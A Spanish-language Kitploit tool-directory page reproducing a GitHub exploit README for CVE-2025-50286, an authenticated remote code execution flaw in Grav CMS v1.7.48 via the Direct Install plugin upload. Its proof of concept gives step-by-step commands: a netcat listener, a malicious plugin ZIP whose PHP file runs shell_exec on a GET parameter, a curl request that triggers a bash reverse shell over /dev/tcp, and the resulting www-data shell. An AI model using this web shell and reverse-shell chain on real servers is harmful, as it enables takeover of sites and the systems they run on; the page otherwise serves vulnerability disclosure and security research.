Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-50286 — Exploit de ejecución remota de código autenticado para Grav CMS v1.7.48 mediante carga de plugin malicioso en la función de Instalación Directa, con prueba de concepto y activación de reverse shell. | Kitploit
Herramientas/GitHubGitHub/binneko/cve-2025-50286
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubbinneko/cve-2025-50286

CVE-2025-50286

Exploit de ejecución remota de código autenticado para Grav CMS v1.7.48 mediante carga de plugin malicioso en la función de Instalación Directa, con prueba de concepto y activación de reverse shell.

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Grav CMS v1.7.48 / Admin Plugin v1.10.48 - RCE autenticado a través de la subida de plugins (CVE-2025-50286)

Grav CMS v1.7.48 con Admin Plugin v1.10.48 es vulnerable a Ejecución Remota de Código (RCE) a través de la función de subida de plugins "Instalación Directa", permitiendo a administradores autenticados ejecutar código PHP arbitrario en el servidor.

ID de CVE

CVE-2025-50286

Resumen

  • Tipo: Ejecución Remota de Código (RCE) autenticada
  • Ubicación: /admin/tools/direct-install (Panel de Administración > Herramientas > Instalación Directa)
  • Impacto: Ejecución de código PHP arbitrario y posible compromiso total del sistema
  • Autenticación requerida: Sí (acceso de administrador)
  • Versión afectada: Grav CMS v1.7.48 / Admin Plugin v1.10.48

Prueba de concepto

  1. Prepare un listener:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Inicie sesión en el Panel de Administración de Grav como administrador.

  3. Navegue a Herramientas > Instalación Directa

  4. Suba un ZIP de plugin malicioso (evilplugin.zip) estructurado de la siguiente manera:

    root@kitploit:~
    evilplugin/
    ├── evilplugin.php         ← contiene: shell_exec($_GET['cmd'])
    └── blueprints.yaml        ← blueprint mínimo para pasar la validación
    
  5. Desencadene la shell reversa:

    root@kitploit:~
    curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
    
  6. Shell reversa recibida:

    root@kitploit:~
    $ nc -lvnp 4444
    Listening on 0.0.0.0 4444
    Connection received on <target-ip>
    www-data@target:/var/www/html$ whoami
    www-data
    

Componente afectado

  • Endpoint: /admin/tools/direct-install
  • Funcionalidad: Subida de plugins y autocarga sin validación

Probado en

  • Debian 11
  • Apache2 + PHP 7.4
  • Grav CMS v1.7.48 (con Admin Plugin v1.10.48)

Descubridor

@binneko

Referencias

  • Grav CMS en GitHub
  • Registro CVE - CVE-2025-50286

Aviso legal

Solo con fines educativos y defensivos.

Descargar herramienta